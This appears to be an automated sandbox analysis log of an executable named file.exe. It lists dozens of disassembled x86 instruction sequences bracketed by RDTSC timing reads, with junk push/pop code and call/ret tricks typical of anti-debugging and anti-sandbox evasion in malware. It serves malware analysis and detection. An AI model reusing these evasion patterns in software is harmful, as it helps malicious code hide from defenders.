                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E60D3 second address: 5E6169 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push edx 0x0000000c call 00007F789C73D5A8h 0x00000011 pop edx 0x00000012 mov dword ptr [esp+04h], edx 0x00000016 add dword ptr [esp+04h], 00000018h 0x0000001e inc edx 0x0000001f push edx 0x00000020 ret 0x00000021 pop edx 0x00000022 ret 0x00000023 mov dword ptr [ebp+122D1E1Fh], esi 0x00000029 mov edi, dword ptr [ebp+122D298Ch] 0x0000002f push dword ptr fs:[00000000h] 0x00000036 or ebx, dword ptr [ebp+12468F24h] 0x0000003c mov dword ptr fs:[00000000h], esp 0x00000043 mov di, 82D3h 0x00000047 mov eax, dword ptr [ebp+122D0535h] 0x0000004d mov edi, ecx 0x0000004f push FFFFFFFFh 0x00000051 mov dword ptr [ebp+122D2284h], eax 0x00000057 mov ebx, dword ptr [ebp+122D3B15h] 0x0000005d nop 0x0000005e jne 00007F789C73D5C7h 0x00000064 push eax 0x00000065 push eax 0x00000066 push edx 0x00000067 push eax 0x00000068 push edx 0x00000069 je 00007F789C73D5A6h 0x0000006f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E6169 second address: 5E616F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E7E7C second address: 5E7E93 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F789C73D5A8h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 jc 00007F789C73D5A6h 0x00000016 pop ecx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E8E66 second address: 5E8F01 instructions: 0x00000000 rdtsc 0x00000002 je 00007F789CC6148Ch 0x00000008 jne 00007F789CC61486h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp], eax 0x00000013 push 00000000h 0x00000015 push ebp 0x00000016 call 00007F789CC61488h 0x0000001b pop ebp 0x0000001c mov dword ptr [esp+04h], ebp 0x00000020 add dword ptr [esp+04h], 0000001Bh 0x00000028 inc ebp 0x00000029 push ebp 0x0000002a ret 0x0000002b pop ebp 0x0000002c ret 0x0000002d jmp 00007F789CC61495h 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push ecx 0x00000037 call 00007F789CC61488h 0x0000003c pop ecx 0x0000003d mov dword ptr [esp+04h], ecx 0x00000041 add dword ptr [esp+04h], 0000001Dh 0x00000049 inc ecx 0x0000004a push ecx 0x0000004b ret 0x0000004c pop ecx 0x0000004d ret 0x0000004e sbb ebx, 4EBA4AC2h 0x00000054 push 00000000h 0x00000056 push 00000000h 0x00000058 push edx 0x00000059 call 00007F789CC61488h 0x0000005e pop edx 0x0000005f mov dword ptr [esp+04h], edx 0x00000063 add dword ptr [esp+04h], 00000014h 0x0000006b inc edx 0x0000006c push edx 0x0000006d ret 0x0000006e pop edx 0x0000006f ret 0x00000070 push eax 0x00000071 pushad 0x00000072 pushad 0x00000073 push eax 0x00000074 push edx 0x00000075 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E8067 second address: 5E806B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E8F01 second address: 5E8F07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E806B second address: 5E8078 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E8F07 second address: 5E8F14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jbe 00007F789CC61486h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E8078 second address: 5E807E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E807E second address: 5E80EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push esi 0x00000006 pop esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b jmp 00007F789CC61496h 0x00000010 push dword ptr fs:[00000000h] 0x00000017 js 00007F789CC61489h 0x0000001d mov di, dx 0x00000020 mov dword ptr fs:[00000000h], esp 0x00000027 push 00000000h 0x00000029 push edx 0x0000002a call 00007F789CC61488h 0x0000002f pop edx 0x00000030 mov dword ptr [esp+04h], edx 0x00000034 add dword ptr [esp+04h], 00000019h 0x0000003c inc edx 0x0000003d push edx 0x0000003e ret 0x0000003f pop edx 0x00000040 ret 0x00000041 mov ebx, dword ptr [ebp+1245A9D8h] 0x00000047 mov eax, dword ptr [ebp+122D0111h] 0x0000004d push FFFFFFFFh 0x0000004f mov ebx, edi 0x00000051 nop 0x00000052 push eax 0x00000053 push edx 0x00000054 push eax 0x00000055 push edx 0x00000056 push edx 0x00000057 pop edx 0x00000058 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E80EE second address: 5E80F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E80F2 second address: 5E80F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E80F8 second address: 5E80FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E80FE second address: 5E8110 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c je 00007F789CC61486h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EA035 second address: 5EA0A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a mov edi, dword ptr [ebp+122D392Dh] 0x00000010 push dword ptr fs:[00000000h] 0x00000017 mov ebx, dword ptr [ebp+122D3975h] 0x0000001d mov dword ptr fs:[00000000h], esp 0x00000024 push 00000000h 0x00000026 push esi 0x00000027 call 00007F789C73D5A8h 0x0000002c pop esi 0x0000002d mov dword ptr [esp+04h], esi 0x00000031 add dword ptr [esp+04h], 00000019h 0x00000039 inc esi 0x0000003a push esi 0x0000003b ret 0x0000003c pop esi 0x0000003d ret 0x0000003e mov ebx, 5CB474A7h 0x00000043 mov eax, dword ptr [ebp+122D0C45h] 0x00000049 cld 0x0000004a xor dword ptr [ebp+122DB94Ch], edi 0x00000050 push FFFFFFFFh 0x00000052 clc 0x00000053 nop 0x00000054 jmp 00007F789C73D5AFh 0x00000059 push eax 0x0000005a push eax 0x0000005b push edx 0x0000005c push eax 0x0000005d push edx 0x0000005e pushad 0x0000005f popad 0x00000060 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EA0A6 second address: 5EA0AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5ECF6D second address: 5ECF73 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5ECF73 second address: 5ECF84 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F789CC61488h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edi 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EDEFC second address: 5EDFA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F789C73D5B2h 0x0000000a popad 0x0000000b push eax 0x0000000c jl 00007F789C73D5B2h 0x00000012 jg 00007F789C73D5ACh 0x00000018 nop 0x00000019 push 00000000h 0x0000001b push eax 0x0000001c call 00007F789C73D5A8h 0x00000021 pop eax 0x00000022 mov dword ptr [esp+04h], eax 0x00000026 add dword ptr [esp+04h], 0000001Dh 0x0000002e inc eax 0x0000002f push eax 0x00000030 ret 0x00000031 pop eax 0x00000032 ret 0x00000033 jmp 00007F789C73D5ABh 0x00000038 push 00000000h 0x0000003a clc 0x0000003b push 00000000h 0x0000003d push 00000000h 0x0000003f push edi 0x00000040 call 00007F789C73D5A8h 0x00000045 pop edi 0x00000046 mov dword ptr [esp+04h], edi 0x0000004a add dword ptr [esp+04h], 00000018h 0x00000052 inc edi 0x00000053 push edi 0x00000054 ret 0x00000055 pop edi 0x00000056 ret 0x00000057 mov dword ptr [ebp+122D1B7Ch], eax 0x0000005d push eax 0x0000005e push eax 0x0000005f push edx 0x00000060 jl 00007F789C73D5BFh 0x00000066 jmp 00007F789C73D5B9h 0x0000006b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EDFA5 second address: 5EDFAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EDFAB second address: 5EDFAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EC08E second address: 5EC092 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5ED1A8 second address: 5ED1AD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EEEF3 second address: 5EEF5F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F789CC6148Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push edi 0x00000012 call 00007F789CC61488h 0x00000017 pop edi 0x00000018 mov dword ptr [esp+04h], edi 0x0000001c add dword ptr [esp+04h], 00000017h 0x00000024 inc edi 0x00000025 push edi 0x00000026 ret 0x00000027 pop edi 0x00000028 ret 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push esi 0x0000002e call 00007F789CC61488h 0x00000033 pop esi 0x00000034 mov dword ptr [esp+04h], esi 0x00000038 add dword ptr [esp+04h], 00000016h 0x00000040 inc esi 0x00000041 push esi 0x00000042 ret 0x00000043 pop esi 0x00000044 ret 0x00000045 jmp 00007F789CC6148Dh 0x0000004a xchg eax, esi 0x0000004b push eax 0x0000004c push edx 0x0000004d push eax 0x0000004e push edx 0x0000004f push ecx 0x00000050 pop ecx 0x00000051 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EEF5F second address: 5EEF63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EEF63 second address: 5EEF69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EEF69 second address: 5EEF81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F789C73D5ADh 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edi 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EE0EA second address: 5EE191 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F789CC61496h 0x00000008 jp 00007F789CC61486h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov dword ptr [esp], eax 0x00000014 mov ebx, dword ptr [ebp+122D2C24h] 0x0000001a push dword ptr fs:[00000000h] 0x00000021 jne 00007F789CC6148Ch 0x00000027 mov dword ptr fs:[00000000h], esp 0x0000002e push 00000000h 0x00000030 push esi 0x00000031 call 00007F789CC61488h 0x00000036 pop esi 0x00000037 mov dword ptr [esp+04h], esi 0x0000003b add dword ptr [esp+04h], 00000014h 0x00000043 inc esi 0x00000044 push esi 0x00000045 ret 0x00000046 pop esi 0x00000047 ret 0x00000048 mov dword ptr [ebp+122D2672h], ebx 0x0000004e mov eax, dword ptr [ebp+122D16C5h] 0x00000054 pushad 0x00000055 pushad 0x00000056 and esi, 6F6226B6h 0x0000005c mov dword ptr [ebp+124899D4h], edx 0x00000062 popad 0x00000063 mov esi, dword ptr [ebp+122D1E9Dh] 0x00000069 popad 0x0000006a sbb ebx, 1145E24Dh 0x00000070 push FFFFFFFFh 0x00000072 jbe 00007F789CC61486h 0x00000078 nop 0x00000079 push eax 0x0000007a push edx 0x0000007b pushad 0x0000007c jmp 00007F789CC6148Bh 0x00000081 jc 00007F789CC61486h 0x00000087 popad 0x00000088 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EE191 second address: 5EE19B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F789C73D5A6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EE19B second address: 5EE1BC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F789CC61494h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EE1BC second address: 5EE1C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EE1C0 second address: 5EE1C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EE1C6 second address: 5EE1CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EE1CC second address: 5EE1D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EF081 second address: 5EF087 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F0F6E second address: 5F0F7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F789CC6148Bh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F0186 second address: 5F01A1 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F789C73D5A8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d ja 00007F789C73D5ACh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 595B7F second address: 595B98 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F789CC61492h 0x00000008 pushad 0x00000009 push esi 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 595B98 second address: 595B9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F86B3 second address: 5F86D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F789CC61493h 0x0000000e jmp 00007F789CC6148Ah 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F86D9 second address: 5F86F5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F789C73D5B6h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F8B11 second address: 5F8B15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FCAFF second address: 5FCB03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FCB03 second address: 5FCB49 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F789CC61493h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b jng 00007F789CC6149Bh 0x00000011 js 00007F789CC61495h 0x00000017 jmp 00007F789CC6148Fh 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 push eax 0x00000021 push edx 0x00000022 js 00007F789CC6148Ch 0x00000028 js 00007F789CC61486h 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FCBD2 second address: 5FCBEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop esi 0x00000006 push eax 0x00000007 jmp 00007F789C73D5AEh 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 pushad 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FCD27 second address: 5FCD43 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F789CC61494h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FCD43 second address: 421C32 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b jmp 00007F789C73D5AFh 0x00000010 pop eax 0x00000011 stc 0x00000012 push dword ptr [ebp+122D0825h] 0x00000018 jmp 00007F789C73D5B0h 0x0000001d call dword ptr [ebp+122D2509h] 0x00000023 pushad 0x00000024 pushad 0x00000025 mov edi, dword ptr [ebp+122D3B49h] 0x0000002b popad 0x0000002c xor eax, eax 0x0000002e mov dword ptr [ebp+122D1953h], edi 0x00000034 mov edx, dword ptr [esp+28h] 0x00000038 jmp 00007F789C73D5B5h 0x0000003d mov dword ptr [ebp+122D3A41h], eax 0x00000043 xor dword ptr [ebp+122D1953h], ecx 0x00000049 sub dword ptr [ebp+122D23D4h], edi 0x0000004f mov esi, 0000003Ch 0x00000054 jmp 00007F789C73D5B2h 0x00000059 add esi, dword ptr [esp+24h] 0x0000005d je 00007F789C73D5B2h 0x00000063 jbe 00007F789C73D5ACh 0x00000069 mov dword ptr [ebp+122D1953h], ebx 0x0000006f lodsw 0x00000071 clc 0x00000072 add eax, dword ptr [esp+24h] 0x00000076 pushad 0x00000077 mov bh, 82h 0x00000079 jbe 00007F789C73D5A6h 0x0000007f popad 0x00000080 mov ebx, dword ptr [esp+24h] 0x00000084 cld 0x00000085 nop 0x00000086 push ecx 0x00000087 push eax 0x00000088 push edx 0x00000089 jns 00007F789C73D5A6h 0x0000008f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6038C3 second address: 6038CE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push edi 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 603444 second address: 603460 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F789C73D5B6h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 603460 second address: 603464 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 603464 second address: 603468 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6035CB second address: 6035DD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F789CC6148Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60374D second address: 603759 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F789C73D5A6h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 608EB5 second address: 608EFB instructions: 0x00000000 rdtsc 0x00000002 jo 00007F789CC61486h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F789CC61494h 0x00000011 popad 0x00000012 push edx 0x00000013 jng 00007F789CC61488h 0x00000019 push edx 0x0000001a pop edx 0x0000001b push ebx 0x0000001c jmp 00007F789CC61499h 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 607A60 second address: 607A77 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F789C73D5B3h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 607A77 second address: 607A81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 607A81 second address: 607A87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 607A87 second address: 607AB7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F789CC6148Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F789CC61496h 0x00000011 jp 00007F789CC61488h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 607C2A second address: 607C34 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F789C73D5ACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 607EF9 second address: 607F15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F789CC61497h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 607F15 second address: 607F1A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 607F1A second address: 607F2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F789CC61486h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 608064 second address: 608068 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 608068 second address: 608087 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F789CC61499h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 608676 second address: 608686 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jnl 00007F789C73D5A6h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 608929 second address: 608936 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F789CC61486h 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 608936 second address: 60893C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60893C second address: 608941 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 608941 second address: 608957 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F789C73D5B0h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 608957 second address: 60895D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60895D second address: 608961 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BDEBE second address: 5BDED1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 jl 00007F789CC6148Eh 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60C342 second address: 60C348 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60C348 second address: 60C35B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F789CC6148Dh 0x0000000b rdtsc
